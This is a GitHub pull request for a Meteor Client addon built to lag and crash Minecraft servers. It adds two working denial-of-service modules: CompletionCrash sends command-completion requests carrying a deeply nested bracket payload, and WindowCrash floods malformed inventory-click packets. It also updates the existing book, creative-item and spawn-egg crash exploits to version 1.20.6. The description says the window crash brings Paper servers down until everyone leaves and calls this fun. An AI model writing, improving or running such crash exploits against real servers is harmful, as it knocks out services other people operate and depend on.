### PR TITLE
add WindowCrash, CompletionCrash + update to 1.20.6

### DIFF
--- a/.github/workflows/gradle.yml
+++ b/.github/workflows/gradle.yml
@@ -18,10 +18,10 @@ jobs:
     runs-on: ubuntu-latest
     steps:
     - uses: actions/checkout@v2
-    - name: Set up JDK 17
+    - name: Set up JDK 21
       uses: actions/setup-java@v2
       with:
-        java-version: 17
+        java-version: 21
         distribution: 'zulu'
     - name: Grant execute permission for gradlew
       run: chmod +x gradlew
@@ -32,8 +32,8 @@ jobs:
     - uses: "marvinpinto/action-automatic-releases@latest"
       with:
           repo_token: "${{ secrets.GITHUB_TOKEN }}"
-          automatic_release_tag: "latest-1.20.2"
+          automatic_release_tag: "latest-1.20.6"
           prerelease: false
-          title: "1.20.2 Build"
+          title: "1.20.6 Build"
           files: |
             ./build/libs/*.jar

--- a/README.md
+++ b/README.md
@@ -7,8 +7,8 @@ An addon to Meteor Client that adds various modules designed to lag and crash se
 </p>
 <div align="center">
   <a href="https://anticope.github.io/meteor-lists/pages/MeteorAddons.html"><img src="https://img.shields.io/badge/Verified%20Addon-Yes-blueviolet" alt="Verified Addon"><a/>
-  <img src="https://img.shields.io/badge/Version-v0.2-orange" alt="Version">
-  <img src="https://img.shields.io/badge/Minecraft%20Version-1.20.4-blue" alt="Minecraft Version">
+  <img src="https://img.shields.io/badge/Version-v0.6-orange" alt="Version">
+  <img src="https://img.shields.io/badge/Minecraft%20Version-1.20.6-blue" alt="Minecraft Version">
   <img src="https://img.shields.io/github/last-commit/AntiCope/meteor-crash-addon?logo=git" alt="Last commit">
   <img src="https://img.shields.io/github/workflow/status/AntiCope/meteor-crash-addon/Java%20CI%20with%20Gradle?logo=github" alt="build status">
   <img src="https://img.shields.io/github/languages/code-size/AntiCope/meteor-crash-addon" alt="Code Size">

--- a/README.md
+++ b/README.md
@@ -8,7 +8,7 @@ An addon to Meteor Client that adds various modules designed to lag and crash se
 <div align="center">
   <a href="https://anticope.github.io/meteor-lists/pages/MeteorAddons.html"><img src="https://img.shields.io/badge/Verified%20Addon-Yes-blueviolet" alt="Verified Addon"><a/>
   <img src="https://img.shields.io/badge/Version-v0.2-orange" alt="Version">
-  <img src="https://img.shields.io/badge/Minecraft%20Version-1.18.2-blue" alt="Minecraft Version">
+  <img src="https://img.shields.io/badge/Minecraft%20Version-1.20.4-blue" alt="Minecraft Version">
   <img src="https://img.shields.io/github/last-commit/AntiCope/meteor-crash-addon?logo=git" alt="Last commit">
   <img src="https://img.shields.io/github/workflow/status/AntiCope/meteor-crash-addon/Java%20CI%20with%20Gradle?logo=github" alt="build status">
   <img src="https://img.shields.io/github/languages/code-size/AntiCope/meteor-crash-addon" alt="Code Size">

--- a/build.gradle
+++ b/build.gradle
@@ -1,5 +1,5 @@
 plugins {
-    id 'fabric-loom' version '1.4-SNAPSHOT'
+    id 'fabric-loom' version '1.6-SNAPSHOT'
     id 'maven-publish'
 }
 

--- a/build.gradle
+++ b/build.gradle
@@ -3,7 +3,7 @@ plugins {
     id 'maven-publish'
 }
 
-sourceCompatibility = targetCompatibility = JavaVersion.VERSION_17
+sourceCompatibility = targetCompatibility = JavaVersion.VERSION_21
 archivesBaseName = project.archives_base_name
 version = project.mod_version
 group = project.maven_group
@@ -37,5 +37,5 @@ processResources {
 
 tasks.withType(JavaCompile).configureEach {
 	it.options.encoding = "UTF-8"
-	it.options.release = 17
+	it.options.release = 21
 }

--- a/gradle.properties
+++ b/gradle.properties
@@ -1,13 +1,13 @@
 org.gradle.jvmargs=-Xmx2G
 
 # Fabric Properties (https://fabricmc.net/develop/)
-minecraft_version=1.20.2
-yarn_mappings=1.20.2+build.4
-loader_version=0.14.23
+minecraft_version=1.20.4
+yarn_mappings=1.20.4+build.3
+loader_version=0.15.11
 
 # Mod Properties
 mod_version=0.6
 maven_group=Wide-Cat
 archives_base_name=meteor-crash-addon
 
-meteor_version=0.5.5
+meteor_version=0.5.6

--- a/gradle.properties
+++ b/gradle.properties
@@ -1,8 +1,8 @@
 org.gradle.jvmargs=-Xmx2G
 
 # Fabric Properties (https://fabricmc.net/develop/)
-minecraft_version=1.20.4
-yarn_mappings=1.20.4+build.3
+minecraft_version=1.20.6
+yarn_mappings=1.20.6+build.1
 loader_version=0.15.11
 
 # Mod Properties
@@ -10,4 +10,4 @@ mod_version=0.6
 maven_group=Wide-Cat
 archives_base_name=meteor-crash-addon
 
-meteor_version=0.5.6
+meteor_version=0.5.7

--- a/gradle/wrapper/gradle-wrapper.properties
+++ b/gradle/wrapper/gradle-wrapper.properties
@@ -1,5 +1,5 @@
 distributionBase=GRADLE_USER_HOME
 distributionPath=wrapper/dists
-distributionUrl=https\://services.gradle.org/distributions/gradle-8.3-bin.zip
+distributionUrl=https\://services.gradle.org/distributions/gradle-8.7-bin.zip
 zipStoreBase=GRADLE_USER_HOME
 zipStorePath=wrapper/dists

--- a/src/main/java/widecat/meteorcrashaddon/CrashAddon.java
+++ b/src/main/java/widecat/meteorcrashaddon/CrashAddon.java
@@ -23,6 +23,7 @@ public class CrashAddon extends MeteorAddon {
         Modules.get().add(new AACCrash());
         Modules.get().add(new BookCrash());
         Modules.get().add(new ContainerCrash());
+        Modules.get().add(new CompletionCrash());
         Modules.get().add(new CraftingCrash());
         Modules.get().add(new CreativeCrash());
         Modules.get().add(new EntityCrash());

--- a/src/main/java/widecat/meteorcrashaddon/CrashAddon.java
+++ b/src/main/java/widecat/meteorcrashaddon/CrashAddon.java
@@ -33,6 +33,7 @@ public class CrashAddon extends MeteorAddon {
         Modules.get().add(new MovementCrash());
         Modules.get().add(new PacketSpammer());
         Modules.get().add(new SequenceCrash());
+        Modules.get().add(new WindowCrash());
 
         Commands.add(new CrashItemCommand());
     }

--- a/src/main/java/widecat/meteorcrashaddon/commands/CrashItemCommand.java
+++ b/src/main/java/widecat/meteorcrashaddon/commands/CrashItemCommand.java
@@ -3,6 +3,8 @@ package widecat.meteorcrashaddon.commands;
 import com.mojang.brigadier.builder.LiteralArgumentBuilder;
 import meteordevelopment.meteorclient.commands.Command;
 import net.minecraft.command.CommandSource;
+import net.minecraft.component.DataComponentTypes;
+import net.minecraft.component.type.NbtComponent;
 import net.minecraft.item.ItemStack;
 import net.minecraft.item.Items;
 import net.minecraft.nbt.NbtCompound;
@@ -30,7 +32,7 @@ public class CrashItemCommand extends Command {
             power.add(NbtDouble.of(0));
             tag1.putString("id", "minecraft:small_fireball");
             tag1.put("power", power);
-            CrashFireball.setSubNbt("EntityTag", tag1);
+            CrashFireball.set(DataComponentTypes.ENTITY_DATA, NbtComponent.of(tag1));
             CreativeInventoryActionC2SPacket balls = new CreativeInventoryActionC2SPacket(36 + mc.player.getInventory().selectedSlot, CrashFireball);
             mc.getNetworkHandler().sendPacket(balls);
             return SINGLE_SUCCESS;
@@ -40,11 +42,13 @@ public class CrashItemCommand extends Command {
             ItemStack gato = new ItemStack(Items.CAT_SPAWN_EGG);
             NbtCompound tag2 = new NbtCompound();
             NbtList pos = new NbtList();
+
             pos.add(NbtDouble.of(2147483647));
             pos.add(NbtDouble.of(2147483647));
             pos.add(NbtDouble.of(2147483647));
+            tag2.putString("id", "minecraft:small_fireball");
             tag2.put("Pos", pos);
-            gato.setSubNbt("EntityTag", tag2);
+            gato.set(DataComponentTypes.ENTITY_DATA, NbtComponent.of(tag2));
             CreativeInventoryActionC2SPacket elgato = new CreativeInventoryActionC2SPacket(36 + mc.player.getInventory().selectedSlot, gato);
             mc.getNetworkHandler().sendPacket(elgato);
             return SINGLE_SUCCESS;

--- a/src/main/java/widecat/meteorcrashaddon/modules/BookCrash.java
+++ b/src/main/java/widecat/meteorcrashaddon/modules/BookCrash.java
@@ -6,17 +6,19 @@ import meteordevelopment.meteorclient.settings.*;
 import meteordevelopment.meteorclient.systems.modules.Module;
 import meteordevelopment.meteorclient.utils.Utils;
 import meteordevelopment.orbit.EventHandler;
+import net.minecraft.component.DataComponentTypes;
+import net.minecraft.component.type.WrittenBookContentComponent;
 import net.minecraft.item.ItemStack;
 import net.minecraft.item.Items;
-import net.minecraft.nbt.NbtCompound;
-import net.minecraft.nbt.NbtList;
-import net.minecraft.nbt.NbtString;
 import net.minecraft.network.packet.c2s.play.BookUpdateC2SPacket;
 import net.minecraft.network.packet.c2s.play.CreativeInventoryActionC2SPacket;
+import net.minecraft.text.RawFilteredPair;
+import net.minecraft.text.Text;
 import org.apache.commons.lang3.RandomStringUtils;
 import widecat.meteorcrashaddon.CrashAddon;
 
 import java.util.ArrayList;
+import java.util.List;
 import java.util.Optional;
 
 public class BookCrash extends Module {
@@ -78,15 +80,14 @@ public class BookCrash extends Module {
                     }
                     slot++;
                     ItemStack book = new ItemStack(Items.WRITTEN_BOOK, 1);
-                    NbtCompound tag = new NbtCompound();
-                    NbtList list = new NbtList();
+                    List<RawFilteredPair<Text>> list = new ArrayList<>();
                     for (int j = 0; j < 99; j++) {
-                        list.add(NbtString.of("{\"text\":" + RandomStringUtils.randomAlphabetic(200) + "\"}"));
+                        list.add(RawFilteredPair.of(Text.of(RandomStringUtils.randomAlphabetic(200))));
                     }
-                    tag.put("author", NbtString.of(RandomStringUtils.randomAlphabetic(9000)));
-                    tag.put("title", NbtString.of(RandomStringUtils.randomAlphabetic(25564)));
-                    tag.put("pages", list);
-                    book.setNbt(tag);
+                    WrittenBookContentComponent component = book.get(DataComponentTypes.WRITTEN_BOOK_CONTENT);
+                    WrittenBookContentComponent newComponent = new WrittenBookContentComponent(RawFilteredPair.of(RandomStringUtils.randomAlphabetic(9000)), RandomStringUtils.randomAlphabetic(25564), component.generation(), list, component.resolved());
+                    book.set(DataComponentTypes.WRITTEN_BOOK_CONTENT, newComponent);
+
                     mc.player.networkHandler.sendPacket(new CreativeInventoryActionC2SPacket(slot, book));
                 }
             }

--- a/src/main/java/widecat/meteorcrashaddon/modules/CompletionCrash.java
+++ b/src/main/java/widecat/meteorcrashaddon/modules/CompletionCrash.java
@@ -1,0 +1,52 @@
+package widecat.meteorcrashaddon.modules;
+
+import meteordevelopment.meteorclient.events.world.TickEvent;
+import meteordevelopment.meteorclient.settings.IntSetting;
+import meteordevelopment.meteorclient.settings.Setting;
+import meteordevelopment.meteorclient.settings.SettingGroup;
+import meteordevelopment.meteorclient.systems.modules.Module;
+import meteordevelopment.orbit.EventHandler;
+import net.minecraft.client.MinecraftClient;
+import net.minecraft.network.packet.c2s.play.RequestCommandCompletionsC2SPacket;
+import widecat.meteorcrashaddon.CrashAddon;
+
+import java.util.stream.Collectors;
+import java.util.stream.IntStream;
+
+public class CompletionCrash extends Module {
+    private final SettingGroup sgGeneral = settings.createGroup("Rate");
+
+    public CompletionCrash() {
+        super(CrashAddon.CATEGORY, "CompletionCrash", "Funny Completion");
+    }
+
+    private int length = 2032;
+
+    private final Setting<Integer> packets = sgGeneral.add(new IntSetting.Builder()
+        .name("Packets per tick")
+        .description("Amount of packets sent each tick")
+        .defaultValue(3)
+        .min(2)
+        .sliderMax(12)
+        .build()
+    );
+
+    @EventHandler
+    private void onTick(TickEvent.Post event) {
+
+        String overflow = generateJsonObject(length);
+        String message = "msg @a[nbt={PAYLOAD}]";
+        String partialCommand = message.replace("{PAYLOAD}", overflow);
+        for (int i = 0; i < packets.get(); i++) {
+            MinecraftClient.getInstance().player.networkHandler.sendPacket(new RequestCommandCompletionsC2SPacket(0, partialCommand));
+        }
+        this.toggle();
+    }
+
+    private String generateJsonObject(int levels) {
+        String in = IntStream.range(0, levels)
+            .mapToObj(i -> "[")
+            .collect(Collectors.joining());
+        return "{a:" + in + "}";
+    }
+}

--- a/src/main/java/widecat/meteorcrashaddon/modules/CreativeCrash.java
+++ b/src/main/java/widecat/meteorcrashaddon/modules/CreativeCrash.java
@@ -8,6 +8,8 @@ import meteordevelopment.meteorclient.settings.Setting;
 import meteordevelopment.meteorclient.settings.SettingGroup;
 import meteordevelopment.meteorclient.systems.modules.Module;
 import meteordevelopment.orbit.EventHandler;
+import net.minecraft.component.DataComponentTypes;
+import net.minecraft.component.type.NbtComponent;
 import net.minecraft.item.ItemStack;
 import net.minecraft.item.Items;
 import net.minecraft.nbt.NbtCompound;
@@ -54,8 +56,10 @@ public class CreativeCrash extends Module {
         list.add(NbtDouble.of(pos.x));
         list.add(NbtDouble.of(pos.y));
         list.add(NbtDouble.of(pos.z));
+        //idk
+        tag.putString("id", "minecraft:small_fireball");
         tag.put("Pos", list);
-        the.setSubNbt("BlockEntityTag", tag);
+        the.set(DataComponentTypes.BLOCK_ENTITY_DATA, NbtComponent.of(tag));
         for (int i = 0; i < amount.get(); i++) {
             mc.getNetworkHandler().sendPacket(new CreativeInventoryActionC2SPacket(1, the));
         }

--- a/src/main/java/widecat/meteorcrashaddon/modules/WindowCrash.java
+++ b/src/main/java/widecat/meteorcrashaddon/modules/WindowCrash.java
@@ -1,0 +1,57 @@
+package widecat.meteorcrashaddon.modules;
+
+import it.unimi.dsi.fastutil.ints.Int2ObjectArrayMap;
+import meteordevelopment.meteorclient.events.game.GameLeftEvent;
+import meteordevelopment.meteorclient.events.world.TickEvent;
+import meteordevelopment.meteorclient.settings.*;
+import meteordevelopment.meteorclient.systems.modules.Module;
+import meteordevelopment.orbit.EventHandler;
+import net.minecraft.client.MinecraftClient;
+import net.minecraft.item.ItemStack;
+import net.minecraft.item.Items;
+import net.minecraft.network.packet.c2s.play.ClickSlotC2SPacket;
+import net.minecraft.screen.ScreenHandler;
+import net.minecraft.screen.slot.SlotActionType;
+import widecat.meteorcrashaddon.CrashAddon;
+
+public class WindowCrash extends Module {
+    private final SettingGroup sgGeneral = settings.createGroup("Crash");
+
+    private final Setting<Integer> crashPower = sgGeneral.add(new IntSetting.Builder()
+        .name("Packets per tick")
+        .description("Amount of packets sent each tick")
+        .defaultValue(6)
+        .min(2)
+        .sliderMax(12)
+        .build()
+    );
+
+    private final Setting<Boolean> disableOnLeave = sgGeneral.add(new BoolSetting.Builder()
+        .name("Disable on Leave")
+        .description("Automatically disables when you change leave.")
+        .defaultValue(true)
+        .build()
+    );
+
+    public WindowCrash() {
+        super(CrashAddon.CATEGORY, "Window Crasher", "Sends silly packets, paper 1.20.1");
+    }
+
+    @EventHandler
+    private void onTick(TickEvent.Post event) {
+        ScreenHandler handler = MinecraftClient.getInstance().player.currentScreenHandler;
+        Int2ObjectArrayMap itemMap = new Int2ObjectArrayMap();
+        itemMap.put(0, new ItemStack(Items.ACACIA_BOAT, 1));
+        for (int i = 0; i < crashPower.get() + 1; i++) {
+            MinecraftClient.getInstance().player.networkHandler.sendPacket(new ClickSlotC2SPacket(handler.syncId, handler.getRevision(), 36, -1, SlotActionType.SWAP, handler.getCursorStack().copy(), itemMap));
+        }
+    }
+
+    @EventHandler
+    private void onWorldChange(GameLeftEvent event) {
+        if (disableOnLeave.get() && this.isActive()) {
+            this.toggle();
+        }
+    }
+
+}


### PR DESCRIPTION
## Description
<!--- Describe your changes in detail -->

Adds the window crash that is used on paper servers running 1.20.1 and under (prev versions testing needed). Lags out the server and leads to eventual server crash/restart and everyone leaving.
This works because paper handles it as a crash with first priority, taking away focus from actually running the server. 

## Related Issue
<!--- This project only accepts pull requests related to open issues -->
<!--- If suggesting a new feature or change, please discuss it in an issue first -->
<!--- If fixing a bug, there should be an issue describing it with steps to reproduce -->
<!--- Please link to the issue here: -->
#21 - suggestion add windowClick crash

## Motivation and Context
<!--- Why is this change required? What problem does it solve? -->
<!--- If it fixes an open issue, please link to the issue here. -->

New block game crash = fun.

## How Has This Been Tested?
<!--- Please describe in detail how you tested your changes. -->
<!--- Include details of your testing environment, and the tests you ran to -->
<!--- see how your change affects other areas of the code, etc. -->

Tested on local paper server 1.20 and 1.20.1, remote 1.20, running minecraft versions 1.20.4 and 1.20.2.

## Screenshots (if appropriate):

## Types of changes
<!--- What types of changes does your code introduce? Put an `x` in all the boxes that apply: -->
- [ ] Bug fix (non-breaking change which fixes an issue)
- [x] New feature (non-breaking change which adds functionality)
- [ ] Breaking change (fix or feature that would cause existing functionality to change)
- [x] My code follows the code style of this project.
- [x] Have you successfully ran tests with your changes locally?

Note: this is sort of similar to the errorCrash